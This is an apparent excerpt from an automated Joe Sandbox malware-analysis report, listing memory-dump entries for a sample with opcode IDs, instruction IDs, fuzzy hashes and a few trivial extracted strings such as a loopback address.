                                                            • Instruction Fuzzy Hash: F6C106F1E04301ABE7109F24DC817ABB7E4BF96324F09452CF84997292E774E958E792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 127.0.0.1$::1
                                                            • API String ID: 0-3302937015
                                                            • Opcode ID: 3e53dc7c1fff391dc07cf1e76159ef7404e7fc20dc4e9880c416227fc1a1b580
                                                            • Instruction ID: b82bc1f46d301db7522b21ab9e9959619ecf453ba75f36d4d72bdbbe7bf2482f
                                                            • Opcode Fuzzy Hash: 3e53dc7c1fff391dc07cf1e76159ef7404e7fc20dc4e9880c416227fc1a1b580
                                                            • Instruction Fuzzy Hash: 35A1BEB1D04352DBE750DF24C84476BB7E0BF95308F059A69ED888B262F771E990C792
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D
                                                            • API String ID: 0-2746444292
                                                            • Opcode ID: 4346a923e9062ae0bfa6a9551adf6cb5b861d360acf5449f9d6ce79db1b0578f
                                                            • Instruction ID: 3f628ddd0113ed3fcc508a85d12d9074384d9c0616a936cbf830b321aa7e7fcd
                                                            • Opcode Fuzzy Hash: 4346a923e9062ae0bfa6a9551adf6cb5b861d360acf5449f9d6ce79db1b0578f
                                                            • Instruction Fuzzy Hash: 96326B729183818BD725DF28D4806AEF7E1FFC9304F198A2DEAD963351D770A945CB82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H
                                                            • API String ID: 0-2852464175
                                                            • Opcode ID: 369cb9bfc6bae7a8e9b570f988313c60bf9fa3cde68ec34c5703b8aae4970e19
                                                            • Instruction ID: 6001765352ed1813f208559f88bb49d2a392d68e4e6e36f3dfc82bbc055b9015
                                                            • Opcode Fuzzy Hash: 369cb9bfc6bae7a8e9b570f988313c60bf9fa3cde68ec34c5703b8aae4970e19
                                                            • Instruction Fuzzy Hash: 0D91C431B483118FC719CE1CC49016EB7E7AFC9324F1A857DE9D69B389DA31AC468B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                            • Instruction ID: 6c7c8b70187d1a94ff5cca8470cb9edaef9a4dcc3c4b9f7a35eea9daf5c5e901
                                                            • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                            • Instruction Fuzzy Hash: 882264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f61e99bf10028798b60c9be31f016aad17fc848de8cff84351245137acd52696
                                                            • Instruction ID: e2b92b5fdc722b8c0b3bd5588dcccfd6d0ae407b78f2f7d1a8aadb09b13fef3a
                                                            • Opcode Fuzzy Hash: f61e99bf10028798b60c9be31f016aad17fc848de8cff84351245137acd52696
                                                            • Instruction Fuzzy Hash: 7912C676F483154BC30CED6DC992359FAD75BC8310F1A893EA959DB3A0E9B9EC014681
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7ac127d4d33336c5c408d91c7f80683017b92ca8d9c4519f7525ea6039478a9
                                                            • Instruction ID: 3b3eb15fe213742c36e95e961ff2e438f151abf47842453a7ae17898613e85c2
                                                            • Opcode Fuzzy Hash: c7ac127d4d33336c5c408d91c7f80683017b92ca8d9c4519f7525ea6039478a9
                                                            • Instruction Fuzzy Hash: 39E135319083558FFB24CF18C44032ABBE2BB853A4F24852DE5998B395D738ED46BBC1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 388f24893b592e93de7164b22a0f9c2e93e1b37bc594f9c914e60ab05e84d30d
                                                            • Instruction ID: b932ff95ca9fd7f6c2c2d74b410955469189b8c411ef3ae777e099984d5c1653
                                                            • Opcode Fuzzy Hash: 388f24893b592e93de7164b22a0f9c2e93e1b37bc594f9c914e60ab05e84d30d
                                                            • Instruction Fuzzy Hash: 1FC18D71625602CBD329CF19C499665FBE5FF81311F5986ADD6AB8F782C770E880CB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 020bd43a5de1b12b78b9ed8c8f9422a8ec9fdcc5fcee70a7b9dc9ab9ea3ce3d4
                                                            • Instruction ID: 98d97082a7d6338ecadeffc1e1b5a6bcb003faabe5191bc09c8025c7d44c95a1
                                                            • Opcode Fuzzy Hash: 020bd43a5de1b12b78b9ed8c8f9422a8ec9fdcc5fcee70a7b9dc9ab9ea3ce3d4
                                                            • Instruction Fuzzy Hash: 4EA104716483014FD724CE2CC88062ABBEAAFC9350F19866DF5D59739AEB35D8468B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                            • Instruction ID: dcc2182a2e8848b253b0d48e1cd94de8816b2899d6afe32fdca8c700f5414fbe
                                                            • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                            • Instruction Fuzzy Hash: DFA1C631A002598FEB78DE28CD41FDA77E6EF88314F0A8564DD599F3D1EA30AD458780
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0bb0b2a147e240192d1b2c47f07addc355dfca793b95d43e937d08bb06f70bd2
                                                            • Instruction ID: e510b0da11a719d7e4bc8989bd490dc2452705e7a4a706c5061b62707b04dcfe
                                                            • Opcode Fuzzy Hash: 0bb0b2a147e240192d1b2c47f07addc355dfca793b95d43e937d08bb06f70bd2
                                                            • Instruction Fuzzy Hash: A4C1F771914B419BE362CF38C981BEBF7E5BF99300F108A1DE9EA66241EB707584CB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57a83ae6abaf9931eda1f26d898afb58d66be7496114155b3ec48f27a5471885
                                                            • Instruction ID: 675328221c266d808c57bb9679eca400646e9bd30056525473a07d01f08474a5
                                                            • Opcode Fuzzy Hash: 57a83ae6abaf9931eda1f26d898afb58d66be7496114155b3ec48f27a5471885
                                                            • Instruction Fuzzy Hash: 56712C7260C2540ADF1E4A6C5890379AFD74BC722CF9E862AE4E9C739EC735D8478391
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e971045244d2cdd42566542c2f9897d3cbc2e71bebed787637ea9434e6293d8
                                                            • Instruction ID: ddd032723033871b5467c580922c2a79ccc524b02e860328e0e60a53bf8ad7b8
                                                            • Opcode Fuzzy Hash: 4e971045244d2cdd42566542c2f9897d3cbc2e71bebed787637ea9434e6293d8
                                                            • Instruction Fuzzy Hash: F581F861D0D78597E6259B399A017ABB3E8AFF5308F059B18AE8C65013FB31B5E4C342
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2f21a78cb681d7bda99aeb243649ca56b3371e380e40dd5a19748c94e6ac9eb
                                                            • Instruction ID: c47ce6812a9a0ec18ea022e8919d8d704885ed09c67114cdabbcd53ba0a3226f
                                                            • Opcode Fuzzy Hash: d2f21a78cb681d7bda99aeb243649ca56b3371e380e40dd5a19748c94e6ac9eb
                                                            • Instruction Fuzzy Hash: 66711532A18716CBCB10DF1CC89532AB7E1EF85328F99872ED99547385E334E990CB81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71bd80bfe41c0d1f431060d35032828e4ad85b020e7ebd229381f00ca72b1f4f
                                                            • Instruction ID: e70c59c73a6a71828c163d8f7da553c9a1c91fa81ea4523fb6be2b5978face39
                                                            • Opcode Fuzzy Hash: 71bd80bfe41c0d1f431060d35032828e4ad85b020e7ebd229381f00ca72b1f4f
                                                            • Instruction Fuzzy Hash: E6811A72D24B878BD3159F68C8806B6F7A0FFDA314F54472EEAD60A782E7B49181C741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e8cda7be020e388b65794431ec5fc72c6e785c6855ee7970ae8f79d6aeb2e08
                                                            • Instruction ID: efbe299820b817c3372bd44c21f719326be29f9e790c6dc03f3afc25f7565943
                                                            • Opcode Fuzzy Hash: 5e8cda7be020e388b65794431ec5fc72c6e785c6855ee7970ae8f79d6aeb2e08
                                                            • Instruction Fuzzy Hash: 1081D872D24B829BD3158F68C8906B6F7A0FFDA314F14972EEAE606743E7749580C741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d443e3eb0dd40ea07e73e0533d2c9c7d2a6c41a80c508624574f0fbf9cb8b8d
                                                            • Instruction ID: 46e6256b3017bf65ba0087dc0548f72cfbd4e9bd1b69372e4518a88f47f56d69
                                                            • Opcode Fuzzy Hash: 0d443e3eb0dd40ea07e73e0533d2c9c7d2a6c41a80c508624574f0fbf9cb8b8d
                                                            • Instruction Fuzzy Hash: E1614872D187908FD3128F28C8906697BE2FFC6318F2887ADE8951B397E7749A45C741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                            • Instruction ID: 345ec9ea6365ec11c63dd86669aec3d84fef9701589eb029360ee6d68c3faeb5
                                                            • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                            • Instruction Fuzzy Hash: 2731E63170A3594BC719EDADC4C022AF6D79BC826AF59C63DE689C3789E9718C48C781
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 035fb1c08d6e36425a5bb24836e5b357654b32a34bd373fd81f7cfbfee119da9
                                                            • Instruction ID: 5fddb1162e13e433dca07f001f093d091f5fcd5aaf2c518330133d616003fdb4
                                                            • Opcode Fuzzy Hash: 035fb1c08d6e36425a5bb24836e5b357654b32a34bd373fd81f7cfbfee119da9
                                                            • Instruction Fuzzy Hash: B2B012319002018B671BC938EC710D172B273C222535AD4E4D00345016E736E0168700
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [
                                                            • API String ID: 0-784033777
                                                            • Opcode ID: d2759f9a3b77a955ec02749e476448205f34f7e46936816418a0349e5beef08f
                                                            • Instruction ID: 2ea79272800c4319d3ae028bc53e36e3b7b5d4dcbeb898483e939a1b8ece7e1d
                                                            • Opcode Fuzzy Hash: d2759f9a3b77a955ec02749e476448205f34f7e46936816418a0349e5beef08f
                                                            • Instruction Fuzzy Hash: F8B14972D0834D6BDB399A24889073B7BD8EF95328F18052DEBC5C61B1EF69C844B352